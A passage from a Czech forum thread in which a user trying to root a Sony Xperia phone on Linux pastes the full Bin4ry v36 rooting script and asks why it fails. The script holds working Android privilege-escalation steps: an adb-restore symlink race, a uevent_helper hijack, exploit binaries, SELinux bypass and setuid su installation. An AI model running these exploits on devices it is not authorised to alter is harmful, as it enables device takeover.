Odpověď

Upozornění: do tohoto tématu bylo naposledy přispěno před 120 dny.
Zvažte prosím založení nového tématu.
Jméno:
E-mail:
Předmět:
Ikona zprávy:

Ověření:
Zadejte znaky zobrazené na obrázku
Poslechnout obrázek / Požádat o jiný obrázek

Zadejte znaky zobrazené na obrázku:
Kolik má průměrný člověk prstů na pravé ruce? (číslem):
Po dnu přijde:

Zkratky: stiskněte shift+alt+s pro odeslání nebo shift+alt+p pro prohlédnutí


Shrnutí tématu

Poslal: Jiří Doskočil
« kdy: Prosinec 12, 2015, 17:24:49 »

Dekuji urcite to zkusim, nemas nahodou zkusenost i s preinstalaci celeho androidu v telefonu? Nevim jestli s rootem vyresim svuj problem a tohle by byl asi muj dalsi krok
Bohužel nemám, přeinstalace celého telefonu nebyla mým cílem.
Poslal: Peťoš
« kdy: Prosinec 12, 2015, 16:44:21 »

Cau, bohuzel ne. Sam bych rad zmenil ROMku sveho mobilu, ale tohle jde totalne mimo me :( Sorry...
Poslal: LUTEC
« kdy: Prosinec 11, 2015, 22:44:56 »

Tohle mi fungovalo
http://www.svetandroida.cz/framaroot-root-nekolika-desitek-zarizeni-na-jedno-klepnuti-201307
Pardon chtel jsem citovat tento prispevek

Dekuji urcite to zkusim, nemas nahodou zkusenost i s preinstalaci celeho androidu v telefonu? Nevim jestli s rootem vyresim svuj problem a tohle by byl asi muj dalsi krok
Poslal: LUTEC
« kdy: Prosinec 11, 2015, 22:43:48 »

@LUTEC: Proboha, proc to nepripojis ten skript namisto tohoto sileneho vystupu??? Treba bychom vedeli, ktery z tech radku je 446? Tohle uz nedelej...

Dekuji urcite to zkusim, nemas nahodou zkusenost i s preinstalaci celeho androidu v telefonu? Nevim jestli s rootem vyresim svuj problem a tohle by byl asi muj dalsi krok
Poslal: LUTEC
« kdy: Prosinec 11, 2015, 22:41:37 »

Omlouvam se, ale nevedel jsem jak pripojit skript. Uz jsem na to prisel, ale stejne to nejde, protoze zprava pak presahne 2000 znaku:-(
Poslal: Peťoš
« kdy: Prosinec 09, 2015, 12:44:01 »

@LUTEC: Proboha, proc to nepripojis ten skript namisto tohoto sileneho vystupu??? Treba bychom vedeli, ktery z tech radku je 446? Tohle uz nedelej...
Poslal: Jiří Doskočil
« kdy: Prosinec 07, 2015, 21:43:33 »

Poslal: LUTEC
« kdy: Prosinec 07, 2015, 01:50:38 »

pokracovani:  zacinam radkem kde by mela byt chyba

2014root() {
echo "Choos method:"
echo "0) xsacha Z2 Tablet Root"
echo "1) jcase Z1S Root (make sure to download the pwn binary first from XDA thread!)"
echo "Please enter a valid number(0 or 1): "
read type
echo ""
if [ $type -eq 0 ]; then
  z2root
fi
if [ $type -eq 1 ]; then
  z1sroot
fi
}

z1sroot() {
echo "Please connect your device with enabled USB-Debugging ..."
./stuff/adb wait-for-device
echo "Copy needed files ..."
./stuff/adb push z2root/pwn /data/local/tmp/
./stuff/adb shell chmod 777 /data/local/tmp/pwn
./stuff/adb push stuff\su /data/local/tmp/
./stuff/adb push stuff\Superuser.apk /data/local/tmp/
./stuff/adb push stuff\00stop_ric /data/local/tmp/
./stuff/adb push stuff\install_tool.sh /data/local/tmp/
./stuff/adb shell chmod 777 /data/local/tmp/install_tool.sh
./stuff/adb push z2root\busybox /data/local/tmp/
./stuff/adb shell chmod 777 /data/local/tmp/busybox
./stuff/adb shell /data/local/tmp/pwn
./stuff/adb wait-for-device
./stuff/adb reboot
./stuff/adb wait-for-device
echo "Rebooting device, please wait ..."
./stuff\adb.exe shell /data/local/tmp/install_tool.sh
wait 3
./stuff/adb reboot
finish
}

z2root() {
echo "Please connect your device with enabled USB-Debugging ..."
./stuff/adb wait-for-device
echo Copy needed files ...
./stuff/adb install z2root\exploit.apk
./stuff/adb push z2root/xsacha/ /data/local/tmp/
./stuff/adb shell chmod 777 /data/local/tmp/busybox
./stuff/adb shell chmod 777 /data/local/tmp/vdcCreate
./stuff/adb shell chmod 777 /data/local/tmp/startService
./stuff/adb shell '/data/local/tmp/busybox find /data/local/tmp -type f -group 2000 | /data/local/tmp/busybox xargs chmod 777'
./stuff/adb shell /data/local/tmp/vdcCreate
./stuff/adb shell /data/local/tmp/startService
echo "--- Attention ---"
echo "Please 'crash' the Service Menu app that pops up."
echo "For example: Service Info -> Configuration."
echo "Press any button after you have done this."
pause
echo "Congratulations, SELinux is dead. Continuing.."
./stuff/adb shell 'vdc asec mount ../../data/local/tmp/vlib none 2000'
./stuff/adb shell /data/local/tmp/startService
echo "--- Attention ---"
echo "Please 'crash' the Service Menu app that pops up."
echo "For example: Service Info -> Configuration."
echo "Press any button after you have done this."
pause
echo "As Bonus we are making a copy of your TrimArea!"
./stuff/adb pull /data/local/tmp/TA.img
echo "Congratulations, it worked! Your TA.img is right here."
echo Removing exploit app
./stuff/adb uninstall com.peniscorp.evil1
echo "If this helped you please consider donating to the original author xsacha: http://forum.xda-developers.com/showthread.php?t=2781109"
finish
}

newz2root() {
echo waiting for device...
./stuff/adb wait-for-device
./stuff/adb push newz2\files\getroot /data/local/tmp/
./stuff/adb push newz2\files\su /data/local/tmp/
./stuff/adb push newz2\files\Superuser.apk /data/local/tmp/
./stuff/adb push newz2\files\busybox /data/local/tmp/
./stuff/adb push newz2\files\00stop_ric /data/local/tmp/
./stuff/adb push newz2\files\99SuperSUDaemon /data/local/tmp/
./stuff/adb push newz2\files\ric_disabler_mod.ko /data/local/tmp/
./stuff/adb push newz2\files\copymodulecrc /data/local/tmp/
./stuff/adb push newz2\files\saferic /data/local/tmp/
./stuff/adb push newz2\files\install_tool.sh /data/local/tmp/
./stuff/adb shell "chmod 0755 /data/local/tmp/getroot"
./stuff/adb shell "chmod 0755 /data/local/tmp/busybox"
./stuff/adb shell "chmod 0644 /data/local/tmp/ric_disabler_mod.ko"
./stuff/adb shell "chmod 0755 /data/local/tmp/copymodulecrc"
./stuff/adb shell "chmod 0755 /data/local/tmp/install_tool.sh"
./stuff/adb shell "/data/local/tmp/getroot /data/local/tmp/install_tool.sh"
./stuff/adb wait-for-device
echo Cleaning up...
./stuff/adb shell "rm /data/local/tmp/getroot"
./stuff/adb shell "rm /data/local/tmp/su"
./stuff/adb shell "rm /data/local/tmp/Superuser.apk"
./stuff/adb shell "rm /data/local/tmp/busybox"
./stuff/adb shell "rm /data/local/tmp/00stop_ric"
./stuff/adb shell "rm /data/local/tmp/99SuperSUDaemon"
./stuff/adb shell "rm /data/local/tmp/ric_disabler_mod.ko"
./stuff/adb shell "rm /data/local/tmp/copymodulecrc"
./stuff/adb shell "rm /data/local/tmp/saferic"
./stuff/adb shell "rm /data/local/tmp/install_tool.sh"
finish
}

echo "=================================================================================================="
echo "=              This script will root your Android phone with adb restore function                 ="
echo "=                       Script by Bin4ry (converted to shell by jamcswain)                        ="
echo "=                                      (15.06.2014) v36                                           ="
echo "==================================================================================================="
echo ""
export nxt="0"
export ric=0
export type=''
choice



nevim jestli je to vubec mozne, ale pokud by nekdo dokazal poradit jak upravit skript aby fungoval, dost mi to pomuze
Poslal: LUTEC
« kdy: Prosinec 07, 2015, 01:49:28 »

Snazim se o rootnutí sveho telefonu s androidem a vetsina navodu je bohuzel pouze pro operacni system windows. Nasel jsem ale stranky ( http://www.androidgadgematic.com/2012/12/root-sony-xperia-sola-mt27-android-404.html) kde byl navod i pro linux a postupoval podle navodu.
Ve strucnosti jsem stahl archiv  a po rozbaleni v nem par slozek a skript pro windows s koncovkou .bat a pro linux s koncovkou .sh, podle navodu se mel spustit skript, postupoval jsem tak, ze jsem klikl na skript pravym mysitkem a zvolil: cinosti/spustit v konzoli, objevilo se:

Upozornění: Nelze najít '/home/lutec/Stažené/Root_with_Restore_by_Bin4ry_v36/RunMe.sh', spouštím '/bin/bash' jako náhradu. Prosím, zkontrolujte nastavení svého profilu.

[lutec@localhost Root_with_Restore_by_Bin4ry_v36]$

napsal jsem sh RunMe.sh

a vysledek:

[lutec@localhost Root_with_Restore_by_Bin4ry_v36]$ sh RunMe.sh
RunMe.sh: řádek 446: „2014root“: není platným identifikátorem
[lutec@localhost Root_with_Restore_by_Bin4ry_v36]$


cely skript vypada takto:

choice() {
echo "Device type:"
echo "0) New Z2 Root Method by cubeandcube (thanks man!)"
echo "1) 2014 root (thx jcase for nice pwn binary :-) and xsacha for the exploit )"
echo "2) Xperia Root by cubeundcube"
echo "3) Normal"
echo "4) Special (for example: Sony Tablet S, Medion Lifetab)"
echo "5) New Xperia Root by Goroh_kun"
echo "G) Google Glass Root (thx to Saurik for the ab file)"
echo ""
echo "x) Unroot"
echo ""
echo "Make a choice: "
echo "Please enter a valid number(1 to x): "
read type
echo ""
if [ $type -eq 0 ]; then
  newz2root
fi
if [ $type -eq 1 ]; then
  2014root
fi
if [ $type -eq 2 ]; then
  z1root
fi
if [ $type -eq 3 ]; then
  mytest
fi
if [ $type -eq 4 ]; then
  tabsmenu
fi
if [ $type -eq 5 ]; then
  newroot
fi
if [ $type -eq 'G' ]; then
  glassroot
fi
if [ $type -eq 'x' ]; then
  unroot
fi
}

mytest() {
echo "Checking if I should run in Normal Mode or special Sony Mode"
echo "Please connect your device with USB-Debugging enabled now"
echo "Waiting for device to shop up, if nothing happens please check if Windows ADB-drivers are installed correctly!"
./stuff/adb wait-for-device
./stuff/adb pull /system/app/Backup-Restore.apk . > NUL
./stuff/adb pull /system/bin/ric . > NUL
if [ -s ric ]; then
  export ric=1
  else
  echo ""
fi
if [ -s Backup-Restore.apk ]; then
  xps
  else
  echo ""
  other
fi
}

tabsmenu() {
echo ""
echo "Special mode:"
echo "1) Root"
echo "2) Rollback"
echo "Make a choice: "
echo "Please enter a valid number(1 to x): "
read tabtype
if [ $tabtype -eq 1 ]; then
  tabs
fi
if [ $tabtype -eq 2 ]; then
  tabs_rb
fi
}

newroot() {
echo "Please connect Xperia device with enabled USB-Debugging now to your Computer"
./stuff/adb wait-for-device
echo "Going to copy over some files ..."
./stuff/adb push stuff/onload.sh /data/local/tmp/
./stuff/adb shell "chmod 755 /data/local/tmp/onload.sh"
./stuff/adb push z_rootkit/getroot.sh /data/local/tmp/
./stuff/adb push stuff/ric /data/local/tmp/
./stuff/adb push stuff/su /data/local/tmp/
./stuff/adb shell "chmod 755 /data/local/tmp/getroot.sh"
echo "Starting restore operation, please look on your device and confirm restore!"
echo "After that press any key here in the console"
./stuff/adb restore z_rootkit/usbux.ab
read -n 1
echo "After restore is confirmed please look on your device and choose \"Service Tests -> Display\" in Service menu and WAIT THERE!"
./stuff/adb shell "am start -a android.intent.action.MAIN -n com.sonyericsson.android.servicemenu/.ServiceMainMenu"
./stuff/adb shell "while : ; do [ -w /sys/kernel/uevent_helper ] && exit; done"
./stuff/adb shell "echo /data/local/tmp/getroot.sh > /sys/kernel/uevent_helper"
echo "Ok nice ..."
./stuff/adb shell "while : ; do [ -f /dev/sh ] && exit; done"
./stuff/adb push stuff/busybox-armv6l /data/local/tmp/busybox
echo "Stopping RIC"
./stuff/adb push stuff/install-recovery.sh /data/local/tmp/
./stuff/adb push stuff/step2.sh /data/local/tmp/
./stuff/adb push stuff/step3.sh /data/local/tmp/
echo "Pushing su ..."
./stuff/adb push stuff/su /data/local/tmp/
./stuff/adb shell "chmod 777 /data/local/tmp/step2.sh"
./stuff/adb shell "chmod 777 /data/local/tmp/step3.sh"
echo "Running next steps"
./stuff/adb shell "/dev/sh /data/local/tmp/step2.sh"
./stuff/adb install stuff/Superuser.apk
echo "Running final step"
./stuff/adb shell "/dev/sh /data/local/tmp/step3.sh"
echo "Cleaning up"
./stuff/adb shell "rm /data/local/tmp/busybox"
./stuff/adb shell "rm /data/local/tmp/install-recovery.sh"
./stuff/adb shell "rm /data/local/tmp/step2.sh"
./stuff/adb shell "rm /data/local/tmp/su"
./stuff/adb shell "rm /data/local/tmp/onload.sh"
./stuff/adb shell "rm /data/local/tmp/getroot.sh"
echo "Ok rebooting lets hope it worked!"
./stuff/adb reboot
./stuff/adb wait-for-device
echo "Now we need to remove a folder to get NFC working again"
./stuff/adb shell "su -c '/system/bin/rm -r /data/usf'"
./stuff/adb reboot
echo "Rebooting last time now"
finish
}

unroot() {
echo "Really (y/n)?"
read unr
if [ $unr -eq 'n' ]; then
  choice
fi
./stuff/adb push stuff/busybox /data/local/tmp/busybox
./stuff/adb shell "chmod 755 /data/local/tmp/busybox"
./stuff/adb shell "su -c '/data/local/tmp/busybox mount -o remount,rw /system'"
./stuff/adb shell "su -c 'rm /system/xbin/su'"
./stuff/adb shell "su -c 'rm /system/app/Superuser.apk'"
finish
}

xps() {
echo ""
echo "Found Sony Backup-Restore.apk"
echo "LT26,LT22 etc. mode enabled!"
echo ""
rm Backup-Restore.apk
if [ $ric -eq 1 ]; then
  rm ric
  else
  echo ""
fi
  export nxt="1"
  start
}

other() {
echo ""
echo "Normal Mode enabled!"
if [ $ric -eq 1 ]; then
  rm ric
  else
  echo ""
fi
echo ""
start
}

tabs() {
echo ""
echo "Tablet S mode enabled!"
echo ""
start
}

tabs_rb() {
echo ""
echo "Tablet S Roll Back"
echo ""
echo "Please connect device with ADB-Debugging enabled now...."
./stuff/adb wait-for-device
for i in './stuff/adb shell "if [ -d /data/app- ]; then echo 1 ; else echo 0 ; fi"'
do export tabs_app=$i
done
if [ $tabs_app -eq 1 ]; then
  tabs_rb_1
fi
if [ $tabs_app -eq 0 ]; then
  tabs_rb_2
fi
}

finish() {
echo "You can close all open command-prompts now!"
echo "After reboot all is done! Have fun!"
echo "Bin4ry"
read -n 1
exit
}

start() {
./stuff/adb wait-for-device
if [ $type -eq 2 ]; then
  tabtrick
fi
echo "Pushing busybox...."
./stuff/adb push stuff/busybox /data/local/tmp/.
echo "Pushing su binary ...."
./stuff/adb push stuff/su /data/local/tmp/.
echo "Pushing Superuser app"
./stuff/adb push stuff/Superuser.apk /data/local/tmp/.
echo "Making busybox runable ..."
./stuff/adb shell "chmod 755 /data/local/tmp/busybox"
if [ $ric -eq 1 ]; then
  ./stuff/adb push stuff/ric /data/local/tmp/ric
  else
  echo ""
fi
if [ $nxt -eq "1" ]; then
  xpstrick
fi
./stuff/adb restore stuff/fakebackup.ab
echo "Please look at your device and click RESTORE!"
echo "If all is successful I will tell you, if not this shell will run forever."
echo "Running ..."
./stuff/adb shell "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done" > NUL
echo "Successful, going to reboot your device in 10 seconds!"
wait 10
./stuff/adb reboot
echo "Waiting for device to show up again...."
wait 10
./stuff/adb wait-for-device
normal
}

xpstrick() {
export nxt="0"
echo "Pushing fake Backup"
./stuff/adb push stuff/RootMe.tar /data/local/tmp/RootMe.tar
./stuff/adb shell "mkdir /mnt/sdcard/.semc-fullbackup > /dev/null 2>&1"
echo "Extracting fakebackup on device ..."
./stuff/adb shell "cd /mnt/sdcard/.semc-fullbackup/; /data/local/tmp/busybox tar xf /data/local/tmp/RootMe.tar"
echo "Watch now your device. Select the backup named RootMe and restore it!"
./stuff/adb shell "am start com.sonyericsson.vendor.backuprestore/.ui.BackupActivity"
echo "If all is successful I will tell you, if not this shell will run forever."
echo "Running ......"
./stuff/adb shell "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done" > NUL
echo ""
echo "Good, it worked! Now we are rebooting soon, please be patient!"
wait 3
./stuff/adb shell "rm -r /mnt/sdcard/.semc-fullbackup/RootMe"
./stuff/adb reboot
wait 10
echo "Waiting for device to come up again...."
./stuff/adb wait-for-device
normal
}

normal() {
if [ $ric -eq 1 ]; then
  ricstuff
fi
echo "Going to copy files to it's place"
./stuff/adb shell "/data/local/tmp/busybox mount -o remount,rw /system && /data/local/tmp/busybox mv /data/local/tmp/su /system/xbin/su && /data/local/tmp/busybox mv /data/local/tmp/Superuser.apk /system/app/Superuser.apk && /data/local/tmp/busybox cp /data/local/tmp/busybox /system/xbin/busybox && chown 0.0 /system/xbin/su && chmod 06755 /system/xbin/su && chmod 655 /system/app/Superuser.apk && chmod 755 /system/xbin/busybox && rm /data/local.prop && reboot"
finish
}

ricstuff() {
echo "Going to copy files to it's place"
./stuff/adb shell "/data/local/tmp/busybox mount -o remount,rw /system && /data/local/tmp/busybox mv /data/local/tmp/ric /system/bin/ric && chmod 755 /system/bin/ric && /data/local/tmp/busybox mv /data/local/tmp/su /system/xbin/su && /data/local/tmp/busybox mv /data/local/tmp/Superuser.apk /system/app/Superuser.apk && /data/local/tmp/busybox cp /data/local/tmp/busybox /system/xbin/busybox && chown 0.0 /system/xbin/su && chmod 06755 /system/xbin/su && chmod 655 /system/app/Superuser.apk && chmod 755 /system/xbin/busybox && rm /data/local.prop && reboot"
finish
}

tabs_rb_1() {
./stuff/adb shell "rm -r /data/data/com.android.settings/a/*"
./stuff/adb restore stuff/tabletS.ab
echo "Please look at your device and click \"Restore my data\""
echo ""
./stuff/adb shell "while [ ! -d /data/data/com.android.settings/a/file99 ] ; do echo 1; done" > NUL
echo "1st RESTORE OK, hit ENTER to continue."
read -n 1
./stuff/adb shell "rm -r /data/data/com.android.settings/a"
./stuff/adb restore stuff/tabletS.ab
echo "Please look at your device and click \"Restore my data\""
echo ""
./stuff/adb shell "while : ; do ln -s /data /data/data/com.android.settings/a/file99; [ -f /data/file99 ] && exit; done" > NUL
./stuff/adb shell "rm -r /data/file99"
echo "Achieved! hit ENTER to continue."
echo ""
read -n 1
./stuff/adb shell "mv /data/system /data/system3"
./stuff/adb shell "mv /data/system- /data/system"
./stuff/adb shell "mv /data/app /data/app3"
./stuff/adb shell "mv /data/app- /data/app"
echo "Roll back compelted."
finish
}

tabs_rb_2() {
echo ""
echo ""
echo "Roll back failed. /data/app- not found."
echo ""
echo ""
finish
}

tabtrick() {
./stuff/adb install -s stuff/Term.apk
./stuff/adb push stuff/busybox /data/local/tmp/.
./stuff/adb push stuff/su /data/local/tmp/.
./stuff/adb push stuff/Superuser.apk /data/local/tmp/.
./stuff/adb push stuff/rootkittablet.tar.gz /data/local/tmp/rootkittablet.tar.gz
./stuff/adb shell "chmod 755 /data/local/tmp/busybox"
./stuff/adb shell "/data/local/tmp/busybox tar -C /data/local/tmp -x -v -f /data/local/tmp/rootkittablet.tar.gz"
./stuff/adb shell "chmod 644 /data/local/tmp/VpnFaker.apk"
./stuff/adb shell "touch -t 1346025600 /data/local/tmp/VpnFaker.apk"
./stuff/adb shell "chmod 755 /data/local/tmp/_su"
./stuff/adb shell "chmod 755 /data/local/tmp/su"
./stuff/adb shell "chmod 755 /data/local/tmp/onload.sh"
./stuff/adb shell "chmod 755 /data/local/tmp/onload2.sh"
./stuff/adb shell "rm -r /data/data/com.android.settings/a/*"
./stuff/adb restore stuff/tabletS.ab
echo "Please look at your device and click \"Restore my data\""
echo ""
./stuff/adb shell "while [ ! -d /data/data/com.android.settings/a/file99 ] ; do echo 1; done" > NUL
wait 3
echo "1st RESTORE OK, hit ENTER to continue."
read -n 1
./stuff/adb shell "rm -r /data/data/com.android.settings/a"
./stuff/adb restore stuff/tabletS.ab
echo "Please look at your device and click \"Restore my data\""
echo ""
./stuff/adb shell "while : ; do ln -s /data /data/data/com.android.settings/a/file99; [ -f /data/file99 ] && exit; done" > NUL
./stuff/adb shell "rm -r /data/file99"
wait 3
echo "Achieved! hit ENTER to continue."
echo ""
read -n 1
./stuff/adb shell "/data/local/tmp/busybox cp -r /data/system /data/system2"
./stuff/adb shell "/data/local/tmp/busybox find /data/system2 -type f -exec chmod 666 {} \;"
./stuff/adb shell "/data/local/tmp/busybox find /data/system2 -type d -exec chmod 777 {} \;"
./stuff/adb shell "mv /data/system /data/system-"
./stuff/adb shell "mv /data/system2 /data/system"
./stuff/adb shell "mv /data/app /data/app-"
./stuff/adb shell "mkdir /data/app"
./stuff/adb shell "mv /data/local/tmp/VpnFaker.apk /data/app"
./stuff/adb shell "/data/local/tmp/busybox sed -f /data/local/tmp/packages.xml.sed /data/system-/packages.xml > /data/system/packages.xml"
./stuff/adb shell "sync; sync; sync"
echo "Need to reboot now!"
./stuff/adb reboot
wait 3
echo "Waiting for device to come up again...."
./stuff/adb wait-for-device
echo "Unlock your device, a Terminal will show now, type this 2 lines, after each line press ENTER"
echo /data/local/tmp/onload.sh
echo /data/local/tmp/onload2.sh
echo "After this is done press a key here in this shell to continue!"
echo "If the shell on your device does not show please re-start the process!"
./stuff/adb shell "am start -n com.android.vpndialogs/.Term"
read -n 1
tabtrick1
}

tabtrick1() {
./stuff/adb push stuff/script1.sh /data/local/tmp/.
./stuff/adb shell "chmod 755 /data/local/tmp/script1.sh"
./stuff/adb shell "/data/local/tmp/script1.sh"
echo "Almost complete! Reboot and cleanup."
./stuff/adb reboot
wait 3
echo "Waiting for device to come up again...."
./stuff/adb wait-for-device
./stuff/adb shell "su -c 'rm -r /data/app2'"
./stuff/adb shell "su -c 'rm -r /data/system2'"
./stuff/adb shell "su -c 'rm -r /data/local/tmp/*'"
finish
}

glassroot() {
echo "Please connect Google Glass with enabled USB-Debugging to your Computer"
./stuff/adb wait-for-device
echo "Doing a Backup first, please confirm this on your Google Glass device!"
./stuff/adb backup -f glassbackup.ab com.google.glass.logging
echo "Done!"
echo "Please select the RESTORE MY DATA option now on your Google Glass device!"
./stuff/adb restore exploit.ab
./stuff/adb shell "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done" > NUL
echo "Ok lets hope it worked! Going to restore previous data, please confirm antoher restore on your Google Glass device!"
./stuff/adb restore glassbackup.ab
echo "Please press any Key when restore is done."
read -n 1
echo "Going to reboot now ..."
./stuff/adb reboot
wait 3
./stuff/adb wait-for-device
./stuff/adb shell "mount -o remount,rw /system"
./stuff/adb push stuff/su /system/xbin/su
./stuff/adb shell "chmod 06755 /system/xbin/su"
./stuff/adb shell "rm /data/local.prop"
./stuff/adb reboot
finish
}

z1root() {
echo "Please connect your device with enabled USB-Debugging ..."
./stuff/adb wait-for-device
echo "Copy needed files ..."
./stuff/adb push stuff/getroot /data/local/tmp/
./stuff/adb push stuff/su /data/local/tmp/
./stuff/adb push stuff/Superuser.apk /data/local/tmp/
./stuff/adb push stuff/busybox /data/local/tmp/
./stuff/adb push stuff/00stop_ric /data/local/tmp/
./stuff/adb push stuff/install_tool.sh /data/local/tmp/
./stuff/adb shell "chmod 0755 /data/local/tmp/getroot"
./stuff/adb shell "chmod 0755 /data/local/tmp/busybox"
./stuff/adb shell "chmod 0755 /data/local/tmp/install_tool.sh"
echo "Running Exploit"
./stuff/adb shell "/data/local/tmp/getroot /data/local/tmp/install_tool.sh"
./stuff/adb shell "rm /data/local/tmp/getroot"
./stuff/adb shell "rm /data/local/tmp/su"
./stuff/adb shell "rm /data/local/tmp/Superuser.apk"
./stuff/adb shell "rm /data/local/tmp/busybox"
./stuff/adb shell "rm /data/local/tmp/00stop_ric"
./stuff/adb shell "rm /data/local/tmp/install_tool.sh"
echo "Rebooting now, after reboot all should be done!"
./stuff/adb reboot
finish
}